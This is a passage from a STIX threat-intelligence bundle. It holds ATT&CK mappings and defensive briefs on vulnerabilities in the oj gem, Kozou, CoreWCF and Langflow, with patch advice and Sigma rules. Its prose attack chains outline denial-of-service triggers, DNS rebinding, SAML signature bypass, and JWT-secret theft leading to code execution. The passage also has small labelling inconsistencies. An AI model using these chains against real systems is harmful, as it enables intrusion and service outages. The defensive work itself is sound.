          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54903"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7802f8b9-a45d-595a-8a82-ae7b512ca767",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61b29054-7212-5c30-9e9d-e2aeb73cd625",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--74e0da79-cbbb-5a83-9927-699e591b962b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61b29054-7212-5c30-9e9d-e2aeb73cd625",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--61b29054-7212-5c30-9e9d-e2aeb73cd625",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Oj Gem Heap Corruption via Negative-Size memcpy (CVE-2026-54900)",
      "description": "## Overview\n\nA critical heap corruption vulnerability, identified as CVE-2026-54900, has been discovered in the popular `oj` gem for Ruby, which is widely used for fast JSON parsing. The flaw affects the `Oj::Parser#parse` method when the `create_id` option is enabled, enabling an attacker to trigger a denial of service (DoS) in applications that process untrusted JSON input. Specifically, when a JSON object key is precisely 65,535 bytes long, an integer truncation occurs in the `form_attr` function (`usual.c:63`). This error leads to a `memcpy` call with a negative size, which the system interprets as `SIZE_MAX` bytes, resulting in a large-scale heap buffer overflow. This memory corruption invariably crashes the Ruby process, rendering the application unavailable. All versions of the `oj` gem containing `ext/oj/usual.c` are affected, including version 3.17.1, with a patch available in version 3.17.2.\n\n## Attack Chain\n\n1.  A malicious actor crafts a JSON payload containing an object with a key that is exactly 65,535 bytes long (e.g., `'A' * 65535`).\n2.  The specially crafted JSON payload is sent to a vulnerable Ruby application that uses the `oj` gem for parsing, with the `Oj::Parser` initialized with the `create_id` option enabled.\n3.  The `Oj::Parser#parse` function processes the incoming JSON data.\n4.  When the parser encounters the 65,535-byte JSON object key, it invokes the internal `form_attr` function (`usual.c:63`) to handle the attribute.\n5.  Inside `form_attr`, an integer truncation occurs when calculating the length (`blen = (int)slen + 1`), causing the 65535-byte length (`slen`) to become `0` (or effectively `SIZE_MAX` when cast to `size_t(-1)` for `memcpy`).\n6.  A `memcpy` operation is then called with this corrupted size (`SIZE_MAX`), attempting to copy an extremely large number of bytes into a small, fixed-size buffer (`buf`).\n7.  This `memcpy` call triggers a heap-based buffer overflow, corrupting critical memory regions adjacent to the buffer.\n8.  The memory corruption results in the immediate termination and crash of the Ruby application process, leading to a denial of service.\n\n## Impact\n\nThe primary impact of CVE-2026-54900 is a denial of service (DoS) for affected Ruby applications. Successful exploitation will cause the targeted application to crash, rendering it unavailable to users. This can lead to significant operational disruptions, loss of data processing capabilities, and potential financial losses for organizations relying on these services. While the immediate outcome is a crash, heap corruption vulnerabilities can sometimes be leveraged for more severe consequences like arbitrary code execution, though the provided information explicitly describes a crash. Organizations using the `oj` gem, especially in web-facing applications that process untrusted JSON, are at risk. The vulnerability affects all versions of the `oj` gem containing `ext/oj/usual.c` and has been confirmed in version 3.17.1.\n\n## Recommendation\n\n*   Immediately update the `oj` gem to version 3.17.2 or later to patch CVE-2026-54900.\n*   Deploy the provided Sigma rules to your SIEM to detect potential exploitation attempts and application crashes.\n*   Enable comprehensive logging for application errors and process crashes on systems running Ruby applications that use the `oj` gem.\n*   Implement input validation for JSON payloads, specifically checking for excessively long keys, if immediate patching is not feasible.\n",
      "published": "2026-06-19T21:06:26Z",
      "labels": [
        "ruby",
        "vulnerability",
        "denial-of-service",
        "heap-corruption",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9cv6-qcjw-4grx"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54900"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8f045d0-534a-56ab-8ed1-f75e37d60a29",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2444ef37-e428-52eb-837b-46625e9ec934",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c984556-47dc-5418-99f1-8e30bedeba52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2444ef37-e428-52eb-837b-46625e9ec934",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5bc6db34-2121-5d12-9101-392c63042e8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2444ef37-e428-52eb-837b-46625e9ec934",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0572da8c-f62a-5b2b-96f8-dabebfa0871c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2444ef37-e428-52eb-837b-46625e9ec934",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2444ef37-e428-52eb-837b-46625e9ec934",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kozou HTTP Servers Vulnerable to DNS Rebinding, DoS, and Default Exposure",
      "description": "## Overview\n\nKozou, a platform that compiles PostgreSQL schemas into an Admin UI, REST API, and an MCP server, was found to contain several critical hardening gaps in versions up to 1.8.0. These vulnerabilities primarily affect the bundled HTTP services and the scaffolded development stack. Key issues include the MCP HTTP server's lack of DNS-rebinding protection, which could allow a malicious webpage in an operator's browser to drive the unauthenticated server and potentially execute functions via the opt-in `call` execution tool or read schema metadata. Both the MCP and in-house REST servers were susceptible to denial of service due to unbounded request-body buffering. Furthermore, read requests incorrectly ran in read/write transactions, and unauthenticated development interfaces were exposed on all network interfaces by default. These issues, which could lead to remote code execution, service disruption, and unauthorized data access, have been addressed in Kozou version 1.8.1.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious web page designed to manipulate an operator's browser's DNS resolution.\n2.  When visited by an operator, the malicious web page rebinds a controlled hostname to the loopback address (`127.0.0.1`) on the operator's machine.\n3.  The operator's browser, attempting to access the attacker's controlled hostname, inadvertently directs HTTP requests to the locally running, unauthenticated Kozou MCP HTTP server.\n4.  The vulnerable MCP server, lacking `Host`/`Origin` header validation, processes these requests, allowing the attacker to read sensitive schema metadata.\n5.  If the opt-in `call` execution tool is enabled, the attacker can leverage the unauthenticated access to execute arbitrary functions on the server, leading to remote code execution (RCE).\n6.  Alternatively, an attacker sends specially crafted HTTP POST/PUT requests with an excessively large body (or without `Content-Length`) to either the MCP HTTP server or the in-house REST server.\n7.  The vulnerable servers, due to unbounded request-body buffering, attempt to read the entire large body into memory, leading to memory exhaustion and a denial-of-service (DoS) condition.\n8.  Separately, if the scaffolded `docker-compose.yml` was used, the unauthenticated Admin UI and MCP HTTP server, along with a default-credential demo database, are exposed on `0.0.0.0` (all interfaces), allowing direct access from any untrusted network to vulnerable services and data.\n\n## Impact\n\nThe identified vulnerabilities can lead to significant compromise. The most severe impact stems from the DNS-rebinding vulnerability combined with the `call` execution tool, enabling unauthenticated remote code execution and full control over the Kozou instance and its underlying PostgreSQL database. The unbounded request-body buffering vulnerability can cause critical business applications to become unavailable due to denial of service, disrupting operations and potentially leading to data loss. Furthermore, the default exposure of unauthenticated services on all network interfaces significantly broadens the attack surface, allowing unauthorized access to sensitive schema metadata and potentially leading to further compromise of the associated database and data.\n\n## Recommendation\n\n*   Upgrade all affected `npm` packages (`kozou`, `@kozou/api`, `@kozou/mcp`, `@kozou/core`) and the container image (`ghcr.io/kozou-dev/kozou`) to version **1.8.1** immediately.\n*   Implement the recommended workarounds if immediate upgrade is not possible: Bind the Admin UI and MCP HTTP server to loopback and publish their host ports on `127.0.0.1` only, and do not expose them to untrusted networks.\n*   Do not enable the MCP `call` execution tool on any non-loopback or unauthenticated deployment.\n*   Deploy an authenticating reverse proxy (with `Host`/`Origin` validation and request-body limits) in front of any Kozou deployment that must be exposed beyond loopback.\n*   Change default credentials for the demo database and restrict its network port if it's deployed.\n*   Deploy the Sigma rules provided in this brief to your SIEM/logging environment to detect exploitation attempts.\n",
      "published": "2026-06-19T21:08:08Z",
      "labels": [
        "web-vulnerability",
        "rce",
        "dos",
        "default-exposure",
        "misconfiguration",
        "dns-rebinding",
        "api-security"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v52w-28xh-v562"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b7a83402-7201-505d-b169-30bd00ebcc2b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CoreWCF SPNEGO Proof Key Exposure (CVE-2026-54784)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-54784, has been identified in CoreWCF, specifically affecting versions prior to 1.9.1, including `CoreWCF.Primitives` versions greater than or equal to 1.9.0 and less than 1.9.1. This flaw allows an unprivileged network attacker to compromise the confidentiality and integrity of WS-SecureConversation traffic. When CoreWCF is configured with `TransportWithMessageCredential` security mode, `Windows` client credential type, and session establishment, the proof key recovered from the Request Security Token Response (RSTR) is wrapped without sufficient confidentiality. If a third party observes this traffic, they can extract the proof key and then impersonate the authenticated Windows principal for the entire lifetime of the SecurityContextToken (defaulting to approximately 10 hours), enabling them to decrypt or forge any subsequent WS-SecureConversation messages that rely on keys derived from the SCT.\n\n## Attack Chain\n\n1.  Attacker positions themselves on the network to observe traffic between a vulnerable CoreWCF service and its client.\n2.  A legitimate client initiates a WS-SecureConversation handshake with the vulnerable CoreWCF service configured with `TransportWithMessageCredential`, `Windows` client credentials, and session establishment.\n3.  During the handshake, a SecurityContextToken (SCT) is established, and a proof key is generated by the server.\n4.  Due to CVE-2026-54784, the CoreWCF service transmits the proof key within the Request Security Token Response (RSTR) without properly encrypting or protecting its confidentiality.\n5.  The attacker, observing the network traffic, intercepts the RSTR and successfully extracts the proof key. This is particularly effective if the communication channel is not protected by SSL/TLS.\n6.  Using the compromised proof key, the attacker is able to decrypt any subsequent WS-SecureConversation traffic exchanged between the legitimate client and the service.\n7.  The attacker can also forge WS-SecureConversation messages, effectively impersonating the legitimate Windows principal for the lifetime of the compromised SCT (approximately 10 hours).\n8.  Through impersonation or decryption, the attacker gains unauthorized access to sensitive information, performs unauthorized actions, or manipulates data.\n\n## Impact\n\nIf CVE-2026-54784 is successfully exploited, an attacker can fully compromise the security context of a legitimate Windows principal within the vulnerable CoreWCF environment. This allows them to decrypt or forge WS-SecureConversation traffic for up to 10 hours, leading to a complete bypass of authentication and authorization mechanisms for that period. The direct consequences include unauthorized access to sensitive data, potential data exfiltration, manipulation of business processes, and disruption of service integrity. Organizations using CoreWCF in mission-critical applications that process sensitive data under the specified configuration are at significant risk of severe data breaches and operational impact.\n\n## Recommendation\n\n*   Immediately patch all instances of CoreWCF to version 1.9.1 or later to remediate CVE-2026-54784. This addresses the underlying vulnerability in `affected_products`.\n*   Ensure that all CoreWCF communications utilizing `TransportWithMessageCredential` with `Windows` client credential type and session establishment are protected by SSL/TLS. This is the primary `workarounds` measure to prevent network observation.\n*   Deploy the \"Detect Cleartext WS-Security/WS-SecureConversation XML Traffic\" Sigma rule to identify non-compliant or potentially vulnerable configurations.\n*   Deploy the \"Detect Unencrypted WCF Endpoint Access\" Sigma rule to monitor for cleartext access to WCF services which should be TLS-protected.\n",
      "published": "2026-06-19T21:09:13Z",
      "labels": [
        "vulnerability",
        "corewcf",
        "spnego",
        "ws-secureconversation",
        ".net",
        "security-context",
        "windows-authentication"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-2288-8h3r-cqgg"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c2b38f0d-a806-5ba2-9943-841665b017bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CoreWCF SamlSerializer Signature Verification Bypass (CVE-2026-54774)",
      "description": "## Overview\n\nThe vulnerability, identified as CVE-2026-54774, affects CoreWCF.Primitives versions prior to 1.8.1 and 1.9.0 up to, but not including, 1.9.1. It resides within the `SamlSerializer` component of CoreWCF, specifically impacting services configured to validate SAML tokens using methods other than X.509 certificates. Attackers can exploit this by crafting a malicious SAML assertion that references a non-X.509 `SecurityToken`'s key identifier (e.g., a `BinarySecretSecurityToken`), thereby bypassing the crucial final signature verification step. This logic flaw can grant unauthorized access to the affected CoreWCF service, allowing for potential impersonation or privilege escalation if the specific preconditions regarding token resolver configuration are met. The flaw highlights the importance of rigorous signature validation in security protocols, even when non-standard token types are in use.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Target Identification:** An attacker identifies a CoreWCF service configured to authenticate using SAML tokens and an `IssuerTokenResolver` holding a non-X.509 `SecurityToken` (e.g., `BinarySecretSecurityToken`) whose key identifier can be referenced.\n2.  **Key Identifier Acquisition/Forgery:** The attacker obtains or forges the key identifier associated with a non-X.509 `SecurityToken` that the vulnerable service is configured to accept from an out-of-band token resolver.\n3.  **SAML Assertion Crafting:** The attacker constructs a SAML assertion document containing a forged signature. Within the `\u003cKeyInfo\u003e` element of this assertion, the attacker embeds a reference to the previously acquired/forged non-X.509 `SecurityToken`'s key identifier (e.g., referencing a `BinarySecretSecurityToken`).\n4.  **Submission of Malicious Assertion:** The attacker sends the specially crafted SAML assertion via an HTTP POST request to the authentication endpoint of the vulnerable CoreWCF service.\n5.  **Signature Verification Bypass:** The CoreWCF `SamlSerializer` processes the incoming SAML assertion. Due to its configuration to accept non-X.509 token validation and the presence of the specific `KeyInfo` reference, the `SamlSerializer` skips the crucial final signature verification step.\n6.  **Unauthorized Access:** The service treats the assertion as valid despite the forged signature, granting the attacker unauthorized access to the CoreWCF service with the privileges associated with the identity claimed in the SAML assertion.\n7.  **Impact (Further Actions):** The attacker can now perform actions within the service context, potentially leading to data exfiltration, unauthorized command execution, or further lateral movement within the network.\n\n## Impact\n\nThe vulnerability allows for authentication bypass, potentially leading to unauthorized access to CoreWCF services. If exploited, an attacker could impersonate legitimate users, access sensitive data, or perform privileged operations within the affected application. The extent of the impact depends on the role and permissions granted by the SAML assertion and the data or functionality exposed by the CoreWCF service. While no specific victims or sectors are mentioned in the source, any organization using vulnerable CoreWCF versions for SAML authentication, particularly those relying on non-X.509 token resolvers, is at risk of complete compromise of the affected service.\n\n## Recommendation\n\n*   Patch CVE-2026-54774 immediately by upgrading CoreWCF.Primitives to version `1.8.1` or `1.9.1` to mitigate the vulnerability.\n*   Deploy the `Detects CVE-2026-54774 exploitation attempt - BinarySecretSecurityToken in SAML Request` Sigma rule to your SIEM and tune for your environment, paying close attention to `webserver` logs.\n*   Deploy the `Detects CVE-2026-54774 related suspicious SAML POST without X509Data` Sigma rule to your SIEM and tune for your environment, focusing on `webserver` logs for anomalous SAML authentication successes.\n",
      "published": "2026-06-19T21:12:13Z",
      "labels": [
        "vulnerability",
        "saml",
        "corewcf",
        "authentication_bypass",
        "cve"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rpj7-hr7h-w6p9"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7cfac7d7-e04c-5919-a900-951876f36d5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d93d7280-5605-543d-bdb0-455bfb28e4f0",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d93d7280-5605-543d-bdb0-455bfb28e4f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CoreWCF Pre-authentication Infinite-Loop CPU Exhaustion (CVE-2026-54772)",
      "description": "## Overview\n\nA critical pre-authentication denial-of-service vulnerability, identified as CVE-2026-54772, has been discovered in CoreWCF affecting its net.tcp, net.pipe, and net.uds framing handshake mechanisms. This flaw allows an unauthenticated remote attacker to trigger an infinite loop by sending specially crafted data during the handshake process. Exploitation results in the targeted CoreWCF service pinning one server thread-pool worker at 100% CPU utilization per malicious connection. By establishing a few such connections, an attacker can completely exhaust the server's CPU resources, rendering the service unavailable to legitimate users. The vulnerability impacts CoreWCF.NetFramingBase versions prior to 1.8.1 and versions 1.9.0 up to, but not including, 1.9.1. Organizations using these vulnerable versions, particularly those exposing CoreWCF endpoints via NetTcpBinding, are urged to apply the available patches immediately.\n\n## Attack Chain\n\n1.  **Target Identification**: An attacker identifies a CoreWCF service exposing an endpoint via NetTcpBinding (or NetNamedPipeBinding/UnixDomainSocketBinding) that is reachable.\n2.  **Initial Connection**: The attacker establishes a TCP connection to the CoreWCF service's exposed `net.tcp` port (e.g., 808 or custom configured port).\n3.  **Malicious Handshake Initiation**: During the pre-authentication framing handshake phase, the attacker sends specially crafted data designed to trigger the infinite loop vulnerability.\n4.  **CPU Exhaustion Trigger**: The CoreWCF service's handling of the malformed handshake enters an uncontrolled infinite loop, causing one of its thread-pool workers to consume 100% of a CPU core.\n5.  **Resource Depletion**: The attacker repeats steps 2-4 with a few additional connections, each new connection consuming another CPU core's full capacity.\n6.  **Denial of Service**: The server's CPU resources become fully exhausted, preventing the CoreWCF service from processing legitimate requests and leading to a denial of service for all users.\n\n## Impact\n\nThe primary impact of CVE-2026-54772 is a severe denial of service (DoS). Successful exploitation allows an unauthenticated remote attacker to completely exhaust the CPU resources of a CoreWCF server. This renders the CoreWCF application and any services it hosts entirely unresponsive, effectively taking them offline. While no data exfiltration or code execution is directly involved, the loss of critical application availability can lead to significant operational disruptions, financial losses, and reputational damage for affected organizations. The vulnerability specifically targets services exposing `net.tcp`, `net.pipe`, or `net.uds` bindings.\n\n## Recommendation\n\n*   Immediately update CoreWCF to version 1.8.1 or 1.9.1 (or newer) to patch CVE-2026-54772.\n*   Deploy the provided Sigma rule \"Detect CoreWCF.NetFramingBase Vulnerable Version Loading\" to identify systems running affected CoreWCF versions in your environment.\n*   Deploy the provided Sigma rule \"Detect Suspicious CoreWCF Net.TCP Connection Activity\" to monitor for unusual connection patterns to your CoreWCF `net.tcp` endpoints.\n*   Monitor server CPU utilization for CoreWCF processes. Unusual and sustained high CPU usage (e.g., 100% on multiple cores) may indicate an active exploitation attempt.\n",
      "published": "2026-06-19T21:13:14Z",
      "labels": [
        "denial-of-service",
        "cpu-exhaustion",
        "corewcf",
        "vulnerability",
        "net.tcp"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-p86g-xrr2-pf7c"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a662a0a-964a-530a-9e96-cfea0b5ab28d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0b83797-f403-5c0d-92bc-14d3bac762ad",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f941ea15-d43a-588d-bbd8-79923ac6dff5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0b83797-f403-5c0d-92bc-14d3bac762ad",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--225f3d5c-5b52-5fec-924c-5e33887a652a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0b83797-f403-5c0d-92bc-14d3bac762ad",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09a0abc0-5f07-52ac-919b-851113a5bd13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0b83797-f403-5c0d-92bc-14d3bac762ad",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a0b83797-f403-5c0d-92bc-14d3bac762ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Langflow Arbitrary File Read and Remote Code Execution via Symlink in Tar Archive (CVE-2026-55447)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-55447) exists in Langflow, affecting all components based on `BaseFileComponent` (e.g., Read File, Docling, NVIDIA Retriever Extraction, Unstructured API) in versions prior to 1.9.2. This flaw allows an unauthenticated attacker to achieve arbitrary file read and, subsequently, remote code execution. The vulnerability resides within the `_unpack_bundle` function in `langflow/src/lfx/src/lfx/base/data/base_file.py`, which improperly handles tar archives containing symbolic links. By crafting a malicious tar file with symlinks pointing to arbitrary files on the system, an attacker can trick Langflow into reading sensitive data, such as the JWT `secret_key`. This secret can then be used to forge authentication tokens, bypass security controls, and execute arbitrary Python code via Langflow's \"Python Interpreter\" node, compromising the underlying server.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious tar archive containing a symbolic link.\n2.  The symbolic link within the archive is configured to point to a sensitive file on the Langflow server, such as the `secret_key` file.\n3.  The attacker uploads this specially crafted tar archive to a vulnerable Langflow component (e.g., a \"Read File\" node) that processes user-controlled files.\n4.  During processing, Langflow's `_unpack_bundle` function extracts the tar, and due to improper validation, follows the symlink, making the content of the target sensitive file accessible within the Langflow environment.\n5.  The attacker interacts with the RAG chatbot (or another method) to retrieve the contents of the `secret_key` file, thereby obtaining the JWT token secret.\n6.  Using the stolen JWT token secret, the attacker forges a valid JSON Web Token for any user ID, successfully bypassing Langflow's authentication mechanism.\n7.  The attacker creates a new flow within the Langflow application and integrates a \"Python Interpreter\" node.\n8.  Arbitrary Python code, supplied by the attacker, is then injected into and executed by the \"Python Interpreter\" node on the underlying Langflow server, leading to Remote Code Execution.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55447 leads to complete compromise of the Langflow instance and potentially the underlying server. Attackers can read any file on the server's filesystem, including sensitive configuration files, credentials, and application data. The ability to forge JWT tokens allows for full authentication bypass, granting administrative access to the Langflow application. The ultimate impact is remote code execution, enabling threat actors to install backdoors, exfiltrate data, pivot to other systems, or disrupt operations. Any Langflow user ingesting user-controlled data is at risk of this critical vulnerability.\n\n## Recommendation\n\n*   Upgrade Langflow to version **1.9.2 or later** immediately to patch CVE-2026-55447.\n*   Deploy the provided Sigma rules to your SIEM to detect suspicious file access and process execution patterns indicative of CVE-2026-55447 exploitation.\n*   Enable comprehensive process creation logging for `python` processes on Langflow servers to detect anomalous command-line arguments, as referenced in the \"Detects CVE-2026-55447 Exploitation - Langflow Arbitrary Python Code Execution\" rule.\n*   Configure file integrity monitoring and logging for sensitive files, especially the `secret_key` file, to detect unauthorized access as detailed in the \"Detects CVE-2026-55447 Exploitation - Suspicious Access to Langflow Secret Key\" rule.\n",
      "published": "2026-06-19T21:33:30Z",
      "labels": [
        "remote-code-execution",
        "arbitrary-file-read",
        "authentication-bypass",
        "supply-chain",
        "python",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-ccv6-r384-xp75"
        },
        {
          "source_name": "reference",
